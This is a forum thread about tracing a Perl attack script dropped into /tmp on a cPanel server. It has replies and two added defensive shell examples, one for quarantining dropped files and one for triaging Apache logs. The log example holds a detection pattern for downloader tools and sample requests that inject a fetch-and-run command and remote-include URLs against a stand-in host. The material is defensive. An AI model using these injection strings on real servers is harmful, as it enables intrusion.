Track Perl Hacking Script
Posted by mali, 05-19-2008, 03:24 AM |
Hi ,
I have FreeBSD with cPanel. Someone is running an attacking Perl script from
my server. Below is information about that script, but it shows the / path in
the command lsof -p 30251 | grep cwd.
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
29018 root 96 0 35968K 30528K select 0:03 2.71% 2.69% perl
newinst# lsof -p 30251 | grep cwd
lsof: WARNING: compiled for FreeBSD release 5.5-STABLE; this is 5.3-RELEASE.
perl 29018 root cwd VDIR 4,12 1024 2 /
newinst# ls -la / | more
total 22413
drwxr-xr-x 25 root wheel 1024 May 16 03:23 .
drwxr-xr-x 25 root wheel 1024 May 16 03:23 ..
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .black
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .black.bak
-rw-r--r-- 2 root wheel 801 Nov 5 2004 .cshrc
-rw-r--r-- 1 root wheel 355 Feb 21 2007 .new
-rw-r--r-- 2 root wheel 251 Nov 5 2004 .profile
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .rbl.db
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .rbl.db.bak
drwxrwxr-x 2 root operator 512 Jul 19 2005 .snap
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .uribl.db
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .uribl.db.bak
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .white
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .white.bak
-r--r--r-- 1 root wheel 6184 Nov 5 2004 COPYRIGHT
drwx--x--x 3 root wheel 512 Aug 20 2005 backup
drwxr-xr-x 2 root wheel 1024 Dec 28 2006 bin
drwxr-xr-x 5 root wheel 512 Jul 19 2005 boot
drwxr-xr-x 2 root wheel 512 Jul 19 2005 cdrom
lrwxr-xr-x 1 root wheel 10 Jul 19 2005 compat -> usr/compat
-rw-r--r-- 1 root wheel 177 Dec 5 12:15 cpgd.c
dr-xr-xr-x 4 root wheel 512 May 16 16:23 dev
drwxr-xr-x 2 root wheel 512 Jul 19 2005 dist
-rw------- 1 root wheel 4096 May 13 15:58 entropy
drwxr-xr-x 28 root wheel 4608 May 19 11:57 etc
drwx--x--x 501 root wheel 9216 May 19 01:33 home
drwxr-xr-x 3 root wheel 1024 Jul 19 2005 lib
drwxr-xr-x 2 root wheel 512 Jul 19 2005 libexec
drwxr-xr-x 2 root wheel 512 Nov 5 2004 mnt
drwxr-xr-x 3 root wheel 512 Jul 21 2005 nonexistent
drwxr-xr-x 8 root wheel 512 Oct 30 2007 opt
-rw------- 1 root wheel 22786048 May 16 04:51 perl.core
dr-xr-xr-x 1 root wheel 0 May 19 11:57 proc
drwxr-xr-x 2 root wheel 2560 Jul 19 2005 rescue
drwxr-xr-x 13 root wheel 1024 May 19 01:33 root
drwxr-xr-x 2 root wheel 2560 Jul 19 2005 sbin
drwxr-xr-x 5 root wheel 13824 May 19 01:22 scripts
drwxr-xr-x 4 root wheel 1024 Jul 19 2005 stand
lrwxrwxrwx 1 root wheel 11 Jul 19 2005 sys -> usr/src/sys
drwxrwxrwt 9 root wheel 31744 May 19 11:57 tmp
drwxr-xr-x 21 root wheel 512 Dec 5 12:12 usr
drwxrwxrwx 24 root wheel 512 May 16 16:24 var
Can anyone suggest where it is located under the / path?
|
Posted by david510, 05-19-2008, 09:09 AM |
Have a check in /tmp for any suspicious files. Also, were you able to find under which user this process was running?
|
Posted by mali, 05-19-2008, 09:30 AM |
ls -la /tmp:
rwxrwxrwx 1 nobody wheel 77589 May 18 19:22 t.txt
The process is running under nobody user.
|
Posted by david510, 05-19-2008, 10:44 AM |
What is the content of that file?
cat t.txt
If you kill the process, does it reappear?
|
Posted by mali, 05-19-2008, 10:53 AM |
newinst# cat t.txt | more
<>
Is there a way that I can clean all .txt files whenever they are uploaded to the /tmp directory?
Last edited by P-nut; 05-26-2008 at 10:36 AM.
Reason: Removed code
|
Posted by david510, 05-19-2008, 11:13 AM |
That shows it. Remove that file. Try to trace how it came into /tmp. Check the domlogs. You can set a cron to remove the .txt files at a specified interval.
|
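The cron-based cleanup suggested above, written out as an added example (not code from the thread). Rather than deleting every .txt in /tmp, which also destroys the evidence of how the server was abused, it moves the dropped files into a root-only quarantine directory, strips their permissions and records a checksum with the original owner and path. The directory names, the owner filter and the sample files in the usage are assumptions for this example.

```shell
#!/bin/sh
# Added example, not code from the thread. Quarantine files dropped into /tmp
# instead of deleting them, so the loader script (e.g. k.txt / t.txt) can still
# be read afterwards. Directory names and the owner filter are assumptions.

# quarantine_dropped_files SRCDIR QUARDIR [OWNER]
#   Moves regular files named *.txt or *.pl found directly in SRCDIR into
#   QUARDIR (optionally only those owned by OWNER, e.g. nobody), appends
#   "<cksum> <size> <owner> <original path>" to QUARDIR/manifest, and prints
#   the number of files moved.
quarantine_dropped_files() {
    src=$1; quar=$2; owner=${3:-}
    mkdir -p "$quar" && chmod 700 "$quar" || return 1
    n=0
    for f in "$src"/*.txt "$src"/*.pl; do
        [ -f "$f" ] || continue            # unmatched glob or not a regular file
        own=$(ls -ld "$f" | awk '{ print $3 }')   # portable across GNU and BSD ls
        if [ -n "$owner" ] && [ "$own" != "$owner" ]; then
            continue
        fi
        n=$((n + 1))
        dst="$quar/$(date +%Y%m%d%H%M%S).$n.$(basename "$f")"
        # POSIX cksum (CRC + size); prefer sha256 / openssl dgst where installed
        sum=$(cksum < "$f" | awk '{ print $1, $2 }')
        if mv "$f" "$dst" && chmod 600 "$dst"; then
            printf '%s %s %s\n' "$sum" "$own" "$f" >> "$quar/manifest"
        else
            n=$((n - 1))
        fi
    done
    echo "$n"
}

# Usage (stand-alone run against a throwaway directory, not the real /tmp):
#   T=$(mktemp -d); mkdir "$T/tmp"; echo 'print 1' > "$T/tmp/k.txt"
#   quarantine_dropped_files "$T/tmp" "$T/quarantine"
# In production: quarantine_dropped_files /tmp /var/quarantine nobody
```

Call it from root's crontab (for example every ten minutes) after killing the running perl process, since the file on disk is only the loader. Two caveats: mounting /tmp noexec does not stop `perl k.txt`, because the interpreter reads the file rather than executing it; and the cron job only limits exposure, the actual fix is the web script that lets a remote client write into /tmp in the first place.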
Posted by mali, 05-20-2008, 02:01 AM |
All these files are uploaded to /tmp with the nobody user and wheel group.
I want these files to be owned by the domain user rather than the nobody user.
Thanks for your Help David.
|
Posted by mali, 05-21-2008, 06:20 AM |
How can I force all sessions and file uploads to /tmp to use the
domain-specific user?
|
Posted by mali, 05-26-2008, 06:27 AM |
Hi,
Today I have a Perl process running from /tmp.
1-ps -aux | grep perl
nobody 55545 0.0 0.4 4924 4244 ?? I 1:51AM 0:00.01 perl k.txt (perl5.8.8)
nobody 56633 0.0 0.4 5320 4632 ?? I 1:53AM 0:00.09 /usr/sbin/httpd (perl5.8.8)
lsof -p 55545 | grep cwd shows the /tmp path.
2-ls -la /
drwxrwxrwt 8 root wheel 31744 May 26 15:24 tmp
How are these processes executed by the nobody user from /tmp?
How can I stop it from executing perl from /tmp like perl k.txt?
|
Posted by helpyoulinux, 05-26-2008, 07:59 AM |
Hello Mali,
As far as I can see, these files are uploaded through Apache. So you should check the Apache logs to get the IP from which the file is uploaded. This way you can block that IP.
Regarding the question, "How can I force all sessions and file uploads to /tmp to use the domain-specific user?", you can try running both Apache and PHP under suEXEC.
Last edited by P-nut; 05-26-2008 at 10:39 AM.
Reason: Removed links to questionable (and possibly infected) sites
|
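Tracing the drop back through the Apache logs, as suggested in the two replies above (check the domlogs, find the IP), written as an added example that is not part of the thread. cPanel keeps per-domain access logs under /usr/local/apache/domlogs/ (an assumed path; any Common or Combined Log Format file works). The function greps for request patterns that commonly precede a file landing in /tmp (remote-file-include URLs, wget/curl/fetch fetches, references to /tmp or perl, cmd= parameters) and tallies the client IPs. The log lines are constructed sample data.

```shell
#!/bin/sh
# Added example, not code from the thread: triage an Apache access log for
# the requests that typically precede a file being dropped into /tmp, and list
# the client IPs responsible. Patterns and the sample log are constructed.

# POSIX ERE of request fragments worth a second look (matched case-insensitively):
#   a downloader invoked through a shell (wget/curl/fetch/lynx followed by a space),
#   a reference to /tmp, "perl " as a command, a cmd= parameter, a parameter whose
#   value is a full URL (classic remote file include), or a ".txt?" loader URL.
SUSPICIOUS='(wget|curl|fetch|lynx)(%20| )|/tmp[/;%" ]|perl(%20| )|[?&]cmd=|=https?://|\.txt\?'

# suspicious_ips LOGFILE
#   Prints "count ip" for every client whose requests match $SUSPICIOUS,
#   highest count first. The first field of each log line is the client IP.
suspicious_ips() {
    grep -iE "$SUSPICIOUS" "$1" \
        | awk '{ print $1 }' \
        | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }'
}

# suspicious_requests LOGFILE
#   Same filter, but prints the full lines so the exact URL that pulled the
#   file in (and which script was abused) can be read and fixed.
suspicious_requests() {
    grep -iE "$SUSPICIOUS" "$1"
}

# make_sample_log PATH
#   Writes a constructed domlog standing in for /usr/local/apache/domlogs/<domain>.
#   Two clients are abusing an include parameter and a CGI form; one is normal.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [26/May/2008:01:50:12 +0500] "GET /index.php?page=http://203.0.113.9/k.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.808"
10.0.0.5 - - [26/May/2008:01:51:03 +0500] "GET /index.php?page=http://203.0.113.9/k.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.808"
198.51.100.7 - - [26/May/2008:01:52:40 +0500] "GET /cgi-bin/form.cgi?cmd=cd%20/tmp;wget%20203.0.113.9/k.txt;perl%20k.txt HTTP/1.0" 200 88 "-" "Mozilla/4.0"
192.0.2.30 - - [26/May/2008:01:53:11 +0500] "GET /images/logo.png HTTP/1.1" 200 4096 "http://example.com/" "Mozilla/5.0"
192.0.2.30 - - [26/May/2008:01:53:12 +0500] "GET /about.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
EOF
}

# Usage (stand-alone run on the constructed log):
#   LOG=$(mktemp) && make_sample_log "$LOG" && suspicious_ips "$LOG"
# On the real server, loop over /usr/local/apache/domlogs/* to find the vhost.
```

Blocking the IPs that come out on top is only a stopgap; the full lines from `suspicious_requests` show which script accepted a URL or a shell command in a parameter, and that script (here the include parameter and the CGI form) is what has to be fixed or removed. Running the site under suEXEC, as suggested above, at least makes the dropped files show up under the domain's user instead of nobody, which makes the owner obvious in `ls -l /tmp`.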
Posted by P-nut, 05-26-2008, 10:47 AM |
Thread has been cleaned of the hacking code and links to their sites. No need to send any traffic to those sites or give an aspiring script kiddie any ideas.
|